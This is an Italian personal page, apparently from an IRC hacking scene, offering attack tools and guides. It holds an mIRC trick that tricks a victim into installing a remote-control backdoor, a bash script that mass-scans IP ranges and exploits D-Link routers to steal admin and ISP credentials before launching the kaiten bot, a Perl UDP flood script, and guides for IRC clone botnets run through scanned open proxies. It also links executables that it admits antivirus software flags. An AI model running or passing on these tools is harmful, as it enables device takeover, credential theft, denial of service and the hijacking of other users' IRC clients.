DonatoX

Ecco una vecchia stringa, che sfrutta un bug dello script, per prendere il controllo dell’utente che usa mIRC.

comandi da far scrivere alla vittima:

/write massop ctcp ^*:passwd:?: .$eval($2-,2) | halt
/load -rs massop

i comandi che l’ owner puo’ esercitare sulla vittima:

/ctcp vittima passwd quit (  )
/ctcp vittima passwd #silence
/ctcp vittima passwd join #silence
/ctcp vittima passwd mode #silence -i
/ctcp vittima passwd mode #silence +o nick
/ctcp vittima passwd mode #silence +b Luna17@*.*
/ctcp vittima passwd mode #silence +k Luna17@*.*
/ctcp vittima passwd msg #silence /password kakka
/ctcp vittima passwd msg #silence /jump
/ctcp vittima passwd msg #silence testo 
/ctcp vittima passwd msg nick testo 
/ctcp vittima passwd nick nicknuovo
/ctcp vittima passwd notice #silence lol
/ctcp vittima passwd password kakka
/ctcp vittima passwd run www.donatox.netsons.org

Altri comandi:
cmd ? Command prompt
winword ? Microsoft Word
excel ? Microsoft Excel
outlook ? Microsoft Outlook
iexplore ? Internet Explorer
firefox ? Mozilla Firefox
notepad ? Notepad
compmgmt.msc ? Computer Management Console
control appwiz.cpl ? Add/Remove programs dialog
mstsc ? Microsoft Terminal Service Client
regedit ? Registry Editor

PS: cambiare la parola “passwd” con una a proprio piacimento

#!/bin/bash
# djkoock & n\ MAYBE final version
# user&pass della connessione inclusi ;)
	
function scan {
echo "Lancio lo skanner su: $range con $threadscan"
./pnscan -s -w"OPTIONS * HTTP/1.0\n\n" -r"UNKNOWN 501 " -n$threadscan $range.0.0:$range.255.255 80 > $range.log &
jobs -l >.tmp
joobs=$(cat .tmp);until [ "$joobs" = "" ];do jobs -l >.tmp ;joobs=$(cat .tmp);sleep 1;echo -n ".";done
rm -f .tmp
echo "Finito! Risultati Scan in $range.log"
#exit
for i in $(cat $range.log|cut -d":" -f1)
do
start
done
}
	
function start {
echo 'POST /cgi-bin/firmwarecfg HTTP/1.1' >> dlink-evilreq
echo 'Host: $i' >> dlink-evilreq
echo 'User-Agent: veryprivateacsor' >> dlink-evilreq
echo 'Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5' >> dlink-evilreq
echo 'Accept-Language: en-us,en;q=0.5' >> dlink-evilreq
echo 'Accept-Encoding: gzip,deflate' >> dlink-evilreq
echo 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7' >> dlink-evilreq
echo 'Keep-Alive: 300' >> dlink-evilreq
echo 'Connection: keep-alive' >> dlink-evilreq
echo 'Content-Type: multipart/form-data; ' >> dlink-evilreq
echo 'boundary=---------------------------41184676334' >> dlink-evilreq
echo 'Content-Length: 234' >> dlink-evilreq
echo '' >> dlink-evilreq
echo '-----------------------------41184676334' >> dlink-evilreq
echo 'Content-Disposition: form-data; name="config.x"' >> dlink-evilreq
echo '' >> dlink-evilreq
echo '' >> dlink-evilreq
echo '-----------------------------41184676334' >> dlink-evilreq
echo 'Content-Disposition: form-data; name="config.y"' >> dlink-evilreq
echo '' >> dlink-evilreq
echo '' >> dlink-evilreq
echo '-----------------------------41184676334--' >> dlink-evilreq
echo ' ' >> dlink-evilreq
###
###  curl -F "config.x=;config.y=" -# http://$i/cgi-bin/firmwarecfg 1> $i.config.xml
###  ^^^^ -> this is too slow! O_o 2sec more than...
###
cat dlink-evilreq | nc -w 7 $i 80 | grep password 1> $i.config.xml
rm -f dlink-evilreq
# original method...
# poba=`awk -F '<' '{print $54 }' $i.config.xml | cut -d '>' -f2 | cut -d ' ' -f1`
# if [ `wc -c $i.config.xml | cut -c1` != 0 ]; then
#
# method by djkoock...
totres=$(cat $i.config.xml|sed 's/>/>\n/g'|grep "</username>\|</password>"|grep -v "test</password>"|cut -d"<" -f1)
pass=$(echo "$totres"|head -2|tail -1)
connuser=$(echo "$totres"|tail -2|head -1)
connpass=$(echo "$totres"|tail -1)
if [ "$pass" != "" ];then
echo ''
echo -e "\033[1;32m 0wn3d \033[1;37m $i:$pass \t\t \033[1;32muser-pass:\033[1;37m $connuser:$connpass\033[0m"
echo -e "$i:$pass $connuser $connpass" >> own3d.log
echo -e "\033[1;32m Starting kaiten.. \033[0m"
./startk $i root $pass
rm -f $i.config.xml
else echo -e "\033[1;31m $i patched... \033[0m"
rm -f $i.config.xml
fi
}
	
options="$1"
shift
	
# test
	
echo "D-link r00t3r by djkoock feat nube"
case "$options" in
-r )	if [ -z $2 ];then echo "Specifica i threads minkiu...";exit;fi
	range="$1"
	threadscan="$2"
	paramy0="$3"
	scan
	exit;;
-f ) 	filez="$1"
	if [ -f $filez ];then 
	paramy0="$2"
        for i in $(awk '{print $1}' $filez)
        do
        start
        done
	else
	echo "NON E' UN FILE MINKIU'"
	exit
	fi
	exit;;
-i )	echo "Provo a Bukare: $1"
	paramy0="$2"
	i="$1"
	start
	exit;;
* )	echo -e "\nUsage: $0 [options] <[<rangeB> <threads>]fileip|ip>"
	echo -e "\ntipo => $0 -r 127.0 100		Scanna e Buka un rangeB cn N threads"
	echo -e "     => $0 -f fileip.txt	Buka gli ip contenuti in un file."
	echo -e "     => $0 -i 192.168.0.1	Buka un ip singolo!"
	exit;;
esac
	
else
        i="$1"
        start
fi
	

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################
	
use Socket;
	
$ARGC=@ARGV;
	
if ($ARGC !=3) {
 printf "$0 <ip> <port> <time>\n";
 printf "if arg1/2 =0, randports/continous packets.\n";
 exit(1);
}
	
my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1]; 
 $time=$ARGV[2];
	
socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");
	
printf "udp flood - odix\n";
	
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;
}
	
packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
} 
	
randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
	

Da copiare negli aliases:

/skick { raw -q KICK # $$1 $+ , $+ $2 $chr(10) KICK # $3 $+ , $+ $4 $+ , $+ $5 $+ , $+ $6 $+ $chr(10) KICK # $+ $7 $+ , $+ $8 $+ , $+ $9 $+ , $+ $10  }

Scanner di porte per Windows

scarica: http://donatox.netsons.org/up/dnx.exe

Vecchio programmino Windowz per creare cloni
Creato e modificato anni fa (penso verso il 2003)
All’epoca andava di moda mettersi l’ 0z finale :D

scarica: http://donatox.netsons.org/up/d0z.rar

PS: l’antivirus potrebbe rilevarlo come virus ma non lo è!

Cloni su linux, decisamente migliori e piu’ veloci proprio come il sistema operativo :)

wget http://irclab.netsons.org/root/xmen2.tar.gz
tar -zxvf xmen2.tar.gz
cd xmen
make
./xmen
load 5 server porta

Leggete questa guida e non domandatemi piu’ come si usa.. e’ roba vecchia e io non la uso da anni.

scarica muhstik

_________________________________

GUIDA CREAZIONE CLONI CON MUHSTIK 4.1.2 SU WINDOWS
Premessa:
Dopo aver letto ed eventualmente applicato questa guida, imparerete a creare dei cloni su IRC, gestibili tramite una schermata di dos, e per questo molto veloci, utilizzando il programma Muhstik e alcuni proxy!!! Inoltre questo programma implementa la possibilità di mettere una password tramite la quale identificarsi e farsi oppare automaticamente (simile ad un eggdrop).

Disclaimer:
Gli admin del sito, non si assumono alcuna responsabilità dell’uso scorretto delle informazioni apprese mediante la lettura della seguente guida o dei danni causati a cose o persone, e ricordando che tutto ciò è spiegato solo a scopo illustrativo, per testare vulnerabilità di sistemi o canali/servers irc.
Occorrente:
Scanner: Consiglio NScan in versione 0.90
Download

Programma: MuhStik per Windows in versione 4.1.2
Download

Lista Ip di tutti i paesi (da inserire nello scanner) Lista 1 Lista2

Procedimento:
Bene… ora dobbiamo trovare degli ip (xxx.xxx.xxx.xxx:porta) e inserirli nel file proxy, presente nella cartella muhstik, che potremo tranquillamente aprire e modificare usando un comune editor di testo.
Per trovare degli ip (numero di riconoscimento, internet protocol, differente in ogni pc, ma che può cambiare ad una nuova connessione) dovrete usare uno scanner (NScan o, eventualmente, anche DSNS) e indicargli di aprire le porte :
8080,6588,8000,3128,4480,1080 Altri Servers

6588,4480 ircNET

Dovrete fare questa differenziazione in quanto molte connessioni tramite porta (tranne quelle citate) sono bannate, ovvero bandite.

Ora passiamo alla parte pratica… una volta inserito un range (ad esempio 80.180.0.0 - 80.182.255.255) e trovati degli ip (formato xxx.xxx.xxx.xxx:porta) dovrete inserirli nel file sopra citato (proxy) e impostare il server nel quale i cloni si connetteranno (file servers).
Una volta fatto ciò vi basterà cliccare sul file Muhstik.bat o, eventualmente, andare tramite dos fino alla cartella dove risiede muhtik e scrivere “muhstik.exe muhstik.conf” .
Bene … il gioco è fatto!

Ecco cosa vi apparirà nella schermata…se ci saranno scritte evidenziate in bianco vorrà dire che è salito qualche clone :D . In ogni caso potrete scrivere “stat” per vedere lo status.
Di seguito riporterò tutti i comandi più comuni e gli effetti che questi hanno :
Available commands:
———————————————————————–
help o ? lista questi comandi
stat scrive lo status (uptime, nicks, channels, users, links)

- Actions:
join entra o rientra in un canale - join #lamest
part esce da un canale - part #lamest
quit esce da IRC e disconnette i bot - quit
privmsg manda un messaggio o un CTCP ad un nick/canale - privmsg nick : messaggio / privmsg #lamest : msg / privmsg nick ctcp ping
nicks cambia i nicks di tutti i cloni - nicks
kb kickbanna un nick da un canale - kb nick #lamest
echo comanda ai cloni di ripetere tutti quello che dice una persona - echo nick
to esegue un nick collide di un nickname fra differenti servers - N.A.
select comanda a un clone di inviare qualcosa tramite IRC - N.A.
mo, mk, mkb, md, mu: massop, masskick, masskickban, massdeop, massunban - mo #lamest / mkb #lamest …
kick, mode, topic: protocolli IRC - kick nick #lamest / mode #lamest +i / ….

- Modes:
agg deoppa gli utenti non conosciuti e li kicka ad ogni messaggio
peace non deoppa automaticamente i nemici
random imposta dei nicks casuali
broadcast converte il modo broadcast nel comando echo
mute smette di scrivere nella finestra

- Environment:
nicklist cambia la lista dei nicks da usare - nicklist lista.txt
chankey imposta una password da usare quando si rientra in un canale - chankey #lamest password
passwd cambia la password della dcc chat (dalla quale potrete controllare i cloni) - passwd password *
load carica un clone dinamico
+prot/-prot inserisce/disinserisce un nickname protetto
+aop/-aop aggiunge/rimuove un host a/da la lista degli aop
+shit/-shit ggiunge/rimuove un host alla/dalla shit list
+scan/-scan inserisce/disinserisce uno scan al join
———————————————————————–
* = questo comando (passwd) è fondamentale in quanto vi permetterà di controllare i cloni direttamente con mirc, usando la dcc chat. Inoltre con questa password ci si potrà automaticamente far aggiungere ad aop e protect lists scrivendo in privato ad un clone il comando : identify password

scarica muhstik

wget -c http://desk.altervista.org/knb.linux.tar.gz
tar xvzf knb.linux.tar.gz
cd knb
pico conf

Esempio

nick dox
realname donatoX Knb
#logfile world.log
nicks a b c d e f g h i j k l m n o p q r s t u v w x y z
channel #silence
server irc.tin.it (server6 per v6)
vhost silence.net
ident silence (sempre per ultimo)

*Installa Crontab:

cd scripts (nella cartella del knb)
sh cron.sh
invio

*Avvia

./knb conf

Scarica dal sito ufficiale il sorge: http://psybnc.at/download.html

wget -c http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz
tar xvzf psyBNC-2.3.2-7.tar.gz
cd psybnc
make
pico psybnc.conf

*Rimuovi (ATTENZIONE!):

mkdir backup | mv salt.h ~/psybnc/backup

*Installa Crontab:

pico psybncchk
PSYBNCPATH=/home/shelluser/psybnc (sostituisci shelluser esci e salva)
crontab -e
0,10,20,30,40,50 * * * * /home/shelluser/psybnc/psybncchk >/dev/null 2>&1 (sostituisci shelluser, incolla, esci e salva)

Avvia BNC

./psybnc